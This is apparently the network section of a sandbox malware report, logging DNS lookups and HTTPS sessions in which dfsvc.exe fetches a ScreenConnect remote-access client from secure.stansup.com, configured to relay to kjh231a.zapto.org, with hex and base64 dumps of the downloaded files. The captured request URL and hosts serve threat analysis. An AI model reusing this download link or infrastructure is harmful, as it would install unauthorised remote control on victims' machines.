                                                                                                                                                                                                                                                      Oct 25, 2024 19:30:49.982139111 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:31:08.471048117 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:31:08.476434946 CEST498398041192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:31:08.482031107 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:31:16.442533970 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:31:16.445117950 CEST498398041192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:31:16.450488091 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:31:20.072031021 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:31:20.086262941 CEST498398041192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:31:20.091907978 CEST80414983979.110.49.185192.168.2.5

                                                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:15.950680017 CEST5998453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:16.176943064 CEST53599841.1.1.1192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:54.217612982 CEST6092053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:54.229527950 CEST53609201.1.1.1192.168.2.5

                                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:15.950680017 CEST192.168.2.51.1.1.10xab37Standard query (0)secure.stansup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:54.217612982 CEST192.168.2.51.1.1.10xc368Standard query (0)kjh231a.zapto.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:16.176943064 CEST1.1.1.1192.168.2.50xab37No error (0)secure.stansup.com79.110.49.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.577104092 CEST1.1.1.1192.168.2.50x51deNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.577104092 CEST1.1.1.1192.168.2.50x51deNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.577104092 CEST1.1.1.1192.168.2.50x51deNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.577104092 CEST1.1.1.1192.168.2.50x51deNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.577104092 CEST1.1.1.1192.168.2.50x51deNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.577104092 CEST1.1.1.1192.168.2.50x51deNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.577104092 CEST1.1.1.1192.168.2.50x51deNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.577104092 CEST1.1.1.1192.168.2.50x51deNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:19.577104092 CEST1.1.1.1192.168.2.50x51deNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:20.556807995 CEST1.1.1.1192.168.2.50xab9cNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:20.556807995 CEST1.1.1.1192.168.2.50xab9cNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:21.693439960 CEST1.1.1.1192.168.2.50x39caNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:21.693439960 CEST1.1.1.1192.168.2.50x39caNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.958736897 CEST1.1.1.1192.168.2.50x3492No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.958736897 CEST1.1.1.1192.168.2.50x3492No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:54.229527950 CEST1.1.1.1192.168.2.50xc368No error (0)kjh231a.zapto.org79.110.49.185A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                                      • secure.stansup.com

                                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      0192.168.2.54970579.110.49.1854433056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:29:18 UTC628OUTGET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      2024-10-25 17:29:18 UTC250INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 118229
                                                                                                                                                                                                                                                      Content-Type: application/x-ms-application; charset=utf-8
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:29:18 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:29:18 UTC16134INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
                                                                                                                                                                                                                                                      2024-10-25 17:29:18 UTC16384INData Raw: 38 6b 4a 65 66 2f 65 72 76 39 41 49 70 57 49 67 4b 51 6e 49 38 43 47 2f 69 6e 41 69 68 4f 72 67 4b 35 33 74 41 44 34 6d 31 44 42 50 74 30 44 67 58 49 7a 54 67 46 2f 38 37 58 42 54 6c 30 6f 77 5a 34 4d 74 73 47 4a 35 4d 43 43 4b 68 4f 6e 51 69 57 6f 4f 51 49 75 46 34 44 43 55 70 7a 4a 41 6e 59 54 56 4d 4a 59 33 49 57 43 32 45 66 6e 67 77 71 57 79 4d 4e 72 6f 68 4e 44 76 56 58 56 41 35 53 5a 4a 6f 4f 4d 77 4f 39 44 74 4d 62 67 67 38 54 52 50 49 50 55 6c 52 38 45 41 47 6c 69 52 47 38 79 66 59 52 6f 64 77 71 45 6c 46 44 4c 68 4b 54 47 45 6b 53 6b 48 75 45 45 6c 4f 31 6d 42 49 59 67 77 51 54 4d 39 72 37 45 35 69 6e 4a 52 53 58 55 49 59 55 79 31 33 46 46 43 58 6b 4e 52 56 67 42 49 49 56 64 59 61 51 46 57 34 36 48 68 59 43 77 4a 63 57 48 61 72 43 46 67 30 41 33
                                                                                                                                                                                                                                                      Data Ascii: 8kJef/erv9AIpWIgKQnI8CG/inAihOrgK53tAD4m1DBPt0DgXIzTgF/87XBTl0owZ4MtsGJ5MCCKhOnQiWoOQIuF4DCUpzJAnYTVMJY3IWC2EfngwqWyMNrohNDvVXVA5SZJoOMwO9DtMbgg8TRPIPUlR8EAGliRG8yfYRodwqElFDLhKTGEkSkHuEElO1mBIYgwQTM9r7E5inJRSXUIYUy13FFCXkNRVgBIIVdYaQFW46HhYCwJcWHarCFg0A3
                                                                                                                                                                                                                                                      2024-10-25 17:29:18 UTC16384INData Raw: 42 6c 41 48 49 41 56 41 42 70 41 48 51 41 62 41 42 6c 41 41 4d 4e 41 41 42 49 51 77 42 76 41 47 34 41 64 41 42 79 41 47 38 41 62 41 42 51 41 47 45 41 62 67 42 6c 41 47 77 41 54 51 42 68 41 47 34 41 59 51 42 6e 41 47 55 41 51 77 42 68 41 48 41 41 64 41 42 31 41 48 49 41 5a 51 42 47 41 47 38 41 62 41 42 6b 41 47 55 41 63 67 42 55 41 47 6b 41 64 41 42 73 41 47 55 41 43 77 30 41 41 46 42 44 41 47 38 41 62 67 42 30 41 48 49 41 62 77 42 73 41 46 41 41 59 51 42 75 41 47 55 41 62 41 42 4e 41 47 45 41 62 67 42 68 41 47 63 41 5a 51 42 44 41 48 49 41 5a 51 42 6b 41 47 55 41 62 67 42 30 41 47 6b 41 59 51 42 73 41 48 4d 41 52 41 42 6c 41 48 4d 41 59 77 42 79 41 47 6b 41 63 41 42 30 41 47 6b 41 62 77 42 75 41 43 49 4e 41 41 42 45 51 77 42 76 41 47 34 41 64 41 42 79 41
                                                                                                                                                                                                                                                      Data Ascii: BlAHIAVABpAHQAbABlAAMNAABIQwBvAG4AdAByAG8AbABQAGEAbgBlAGwATQBhAG4AYQBnAGUAQwBhAHAAdAB1AHIAZQBGAG8AbABkAGUAcgBUAGkAdABsAGUACw0AAFBDAG8AbgB0AHIAbwBsAFAAYQBuAGUAbABNAGEAbgBhAGcAZQBDAHIAZQBkAGUAbgB0AGkAYQBsAHMARABlAHMAYwByAGkAcAB0AGkAbwBuACINAABEQwBvAG4AdAByA
                                                                                                                                                                                                                                                      2024-10-25 17:29:18 UTC16384INData Raw: 51 41 61 51 42 68 41 47 77 41 62 77 42 6e 41 45 4d 41 62 77 42 75 41 47 59 41 61 51 42 6e 41 48 55 41 63 67 42 6c 41 46 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 51 67 42 31 41 48 51 41 64 41 42 76 41 47 34 41 56 41 42 6c 41 48 67 41 64 41 42 6b 4c 51 41 41 62 6b 30 41 59 51 42 6a 41 45 63 41 63 67 42 68 41 47 34 41 64 41 42 42 41 47 4d 41 59 77 42 6c 41 48 4d 41 63 77 42 70 41 47 49 41 61 51 42 73 41 47 6b 41 64 41 42 35 41 46 41 41 5a 51 42 79 41 47 30 41 61 51 42 7a 41 48 4d 41 61 51 42 76 41 47 34 41 63 77 42 45 41 47 6b 41 59 51 42 73 41 47 38 41 5a 77 42 55 41 47 55 41 65 41 42 30 41 45 4d 41 62 77 42 75 41 48 51 41 5a 51 42 75 41 48 51 41 52 67 42 76 41 48 49 41 62 51 42 68 41 48 51 41 65 79 30 41 41 45 35 4e 41
                                                                                                                                                                                                                                                      Data Ascii: QAaQBhAGwAbwBnAEMAbwBuAGYAaQBnAHUAcgBlAFAAZQByAG0AaQBzAHMAaQBvAG4AQgB1AHQAdABvAG4AVABlAHgAdABkLQAAbk0AYQBjAEcAcgBhAG4AdABBAGMAYwBlAHMAcwBpAGIAaQBsAGkAdAB5AFAAZQByAG0AaQBzAHMAaQBvAG4AcwBEAGkAYQBsAG8AZwBUAGUAeAB0AEMAbwBuAHQAZQBuAHQARgBvAHIAbQBhAHQAey0AAE5NA
                                                                                                                                                                                                                                                      2024-10-25 17:29:18 UTC16384INData Raw: 39 32 61 57 52 6c 63 67 46 65 51 32 68 76 62 33 4e 6c 49 48 52 6f 5a 53 42 30 62 32 39 73 49 48 56 7a 5a 57 51 67 64 47 38 67 63 32 56 73 5a 57 4e 30 49 47 45 67 63 6d 56 6e 61 57 39 75 49 47 39 6d 49 48 52 6f 5a 53 42 7a 59 33 4a 6c 5a 57 34 67 5a 6d 39 79 49 47 39 77 64 47 6c 6a 59 57 77 67 59 32 68 68 63 6d 46 6a 64 47 56 79 49 48 4a 6c 59 32 39 6e 62 6d 6c 30 61 57 39 75 49 43 68 50 51 31 49 70 4c 67 45 4c 55 32 56 73 5a 57 4e 30 49 46 52 76 62 32 77 42 50 45 4e 6f 62 32 39 7a 5a 53 42 33 61 47 6c 6a 61 43 42 73 62 32 64 76 62 69 42 7a 5a 58 4e 7a 61 57 39 75 49 48 52 76 49 47 4e 76 62 6e 52 79 62 32 77 67 62 32 34 67 64 47 68 6c 49 48 4a 6c 62 57 39 30 5a 53 42 74 59 57 4e 6f 61 57 35 6c 4c 67 45 55 55 32 56 73 5a 57 4e 30 49 45 78 76 5a 32 39 75 49
                                                                                                                                                                                                                                                      Data Ascii: 92aWRlcgFeQ2hvb3NlIHRoZSB0b29sIHVzZWQgdG8gc2VsZWN0IGEgcmVnaW9uIG9mIHRoZSBzY3JlZW4gZm9yIG9wdGljYWwgY2hhcmFjdGVyIHJlY29nbml0aW9uIChPQ1IpLgELU2VsZWN0IFRvb2wBPENob29zZSB3aGljaCBsb2dvbiBzZXNzaW9uIHRvIGNvbnRyb2wgb24gdGhlIHJlbW90ZSBtYWNoaW5lLgEUU2VsZWN0IExvZ29uI
                                                                                                                                                                                                                                                      2024-10-25 17:29:19 UTC16384INData Raw: 4f 76 65 72 72 69 64 65 2e 65 6e 2d 55 53 2e 72 65 73 6f 75 72 63 65 73 2d 2d 3e 3c 21 2d 2d 7a 73 72 76 76 67 45 41 41 41 43 52 41 41 41 41 62 46 4e 35 63 33 52 6c 62 53 35 53 5a 58 4e 76 64 58 4a 6a 5a 58 4d 75 55 6d 56 7a 62 33 56 79 59 32 56 53 5a 57 46 6b 5a 58 49 73 49 47 31 7a 59 32 39 79 62 47 6c 69 4c 43 42 57 5a 58 4a 7a 61 57 39 75 50 54 51 75 4d 43 34 77 4c 6a 41 73 49 45 4e 31 62 48 52 31 63 6d 55 39 62 6d 56 31 64 48 4a 68 62 43 77 67 55 48 56 69 62 47 6c 6a 53 32 56 35 56 47 39 72 5a 57 34 39 59 6a 63 33 59 54 56 6a 4e 54 59 78 4f 54 4d 30 5a 54 41 34 4f 53 4e 54 65 58 4e 30 5a 57 30 75 55 6d 56 7a 62 33 56 79 59 32 56 7a 4c 6c 4a 31 62 6e 52 70 62 57 56 53 5a 58 4e 76 64 58 4a 6a 5a 56 4e 6c 64 41 49 41 41 41 41 43 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: Override.en-US.resources-->...zsrvvgEAAACRAAAAbFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAACAAAAAAAA
                                                                                                                                                                                                                                                      2024-10-25 17:29:19 UTC16384INData Raw: 73 37 54 2f 44 67 45 48 4a 4c 4d 55 4f 73 70 39 48 48 38 6e 78 77 44 41 31 57 34 53 63 76 6c 62 37 54 56 77 55 71 59 45 58 6b 48 41 49 58 6d 7a 46 6e 6b 6a 31 6d 32 79 44 41 42 45 6f 64 39 71 70 6f 48 62 70 55 72 67 42 67 4b 57 63 67 30 63 34 7a 36 4f 62 38 6b 7a 41 42 43 46 66 6e 39 6a 37 50 2b 58 64 69 69 42 34 78 56 77 35 6d 33 67 2b 50 5a 78 50 43 66 52 41 4d 44 2f 6b 76 61 6b 75 75 47 6a 39 39 2b 36 6b 56 41 43 78 79 76 67 62 58 63 66 78 30 32 75 67 41 45 67 63 6b 5a 54 75 57 37 77 50 34 73 30 4c 68 44 46 37 69 7a 70 76 30 66 41 59 66 64 78 72 45 58 63 69 4d 55 55 4d 41 43 34 58 4d 67 38 65 36 35 75 46 71 6c 51 73 54 2f 62 52 37 6d 32 69 6f 44 6c 37 4f 4d 34 59 67 6f 59 41 43 4b 6c 4e 5a 69 4b 74 34 50 76 51 2b 68 43 6b 31 61 36 6e 32 53 49 53 73 41
                                                                                                                                                                                                                                                      Data Ascii: s7T/DgEHJLMUOsp9HH8nxwDA1W4Scvlb7TVwUqYEXkHAIXmzFnkj1m2yDABEod9qpoHbpUrgBgKWcg0c4z6Ob8kzABCFfn9j7P+XdiiB4xVw5m3g+PZxPCfRAMD/kvakuuGj99+6kVACxyvgbXcfx02ugAEgckZTuW7wP4s0LhDF7izpv0fAYfdxrEXciMUUMAC4XMg8e65uFqlQsT/bR7m2ioDl7OM4YgoYACKlNZiKt4PvQ+hCk1a6n2SISsA
                                                                                                                                                                                                                                                      2024-10-25 17:29:19 UTC3791INData Raw: 62 63 41 41 43 4f 42 36 74 69 49 74 61 41 4d 47 51 41 44 6e 6e 38 59 78 68 6d 33 41 54 78 78 52 41 41 48 73 43 6e 79 33 31 56 37 2b 7a 6d 73 44 42 6b 41 41 35 37 6f 43 32 77 59 4d 67 41 41 65 77 7a 53 4f 56 46 6f 75 39 67 4a 34 58 78 63 53 41 41 49 34 31 30 44 4b 70 66 67 32 34 4b 64 4f 4b 49 41 41 31 6f 71 55 6d 4d 61 78 33 77 76 67 78 61 67 41 66 75 47 45 41 67 68 67 74 69 77 6a 42 45 41 41 31 2b 34 4b 50 4e 38 4c 34 4e 57 6f 41 48 37 6b 68 41 49 49 59 47 5a 32 4d 69 38 6a 74 41 73 4a 51 41 42 7a 61 61 39 51 46 39 4b 43 58 55 67 41 43 4f 42 63 30 7a 6a 47 73 49 78 77 7a 51 45 46 45 4d 41 6b 70 6e 47 4d 59 52 6d 68 49 6d 67 41 41 55 7a 71 43 6a 79 47 4c 69 52 46 30 41 41 43 6d 4e 51 56 65 41 7a 4c 43 46 38 36 6f 41 41 43 6d 4d 52 41 79 76 67 75 4a 45 58
                                                                                                                                                                                                                                                      Data Ascii: bcAACOB6tiItaAMGQADnn8Yxhm3ATxxRAAHsCny31V7+zmsDBkAA57oC2wYMgAAewzSOVFou9gJ4XxcSAAI410DKpfg24KdOKIAA1oqUmMax3wvgxagAfuGEAghgtiwjBEAA1+4KPN8L4NWoAH7khAIIYGZ2Mi8jtAsJQABzaa9QF9KCXUgACOBc0zjGsIxwzQEFEMAkpnGMYRmhImgAAUzqCjyGLiRF0AACmNQVeAzLCF86oAACmMRAyvguJEX


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      1192.168.2.54971179.110.49.1854433056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:29:21 UTC100OUTGET /Bin/ScreenConnect.Client.manifest HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      2024-10-25 17:29:21 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 17858
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:29:21 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:29:21 UTC16169INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
                                                                                                                                                                                                                                                      2024-10-25 17:29:21 UTC1689INData Raw: 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a 69 55 47 73 6f 50 55 58 50 59 56 47 55 7a 74 59 75 42 65 4d 2f 4c 6f 36 4f 77 4b 70 37 41 44 4b 35 47 79 4e 6e 6d 2b 39 36 30 49 48 6e 57 6d 5a 63 79 37 34 30 68 51 38 33 65 52 47 76 37 62 55 4b 4a 47 79 47 46 59 6d 50 56 38 41 68 59 38 67 79 69 74 4f 59 62 73 31 4c 63 4e 55 39 44 34 52 2b 5a 31 4d 49 33 73 4d 4a 4e 32 46 4b 5a 62 53 31 31 30 59 55 30 2f 45 70 46 32 33 72 39
                                                                                                                                                                                                                                                      Data Ascii: ufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBeM/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7bUKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2FKZbS110YU0/EpF23r9


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      2192.168.2.54972279.110.49.1854433056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-10-25 17:29:27 UTC102OUTGET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
                                                                                                                                                                                                                                                      Host: secure.stansup.com
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      2024-10-25 17:29:27 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                                      Content-Length: 95520
                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                      Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                      Date: Fri, 25 Oct 2024 17:29:27 GMT
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-10-25 17:29:27 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
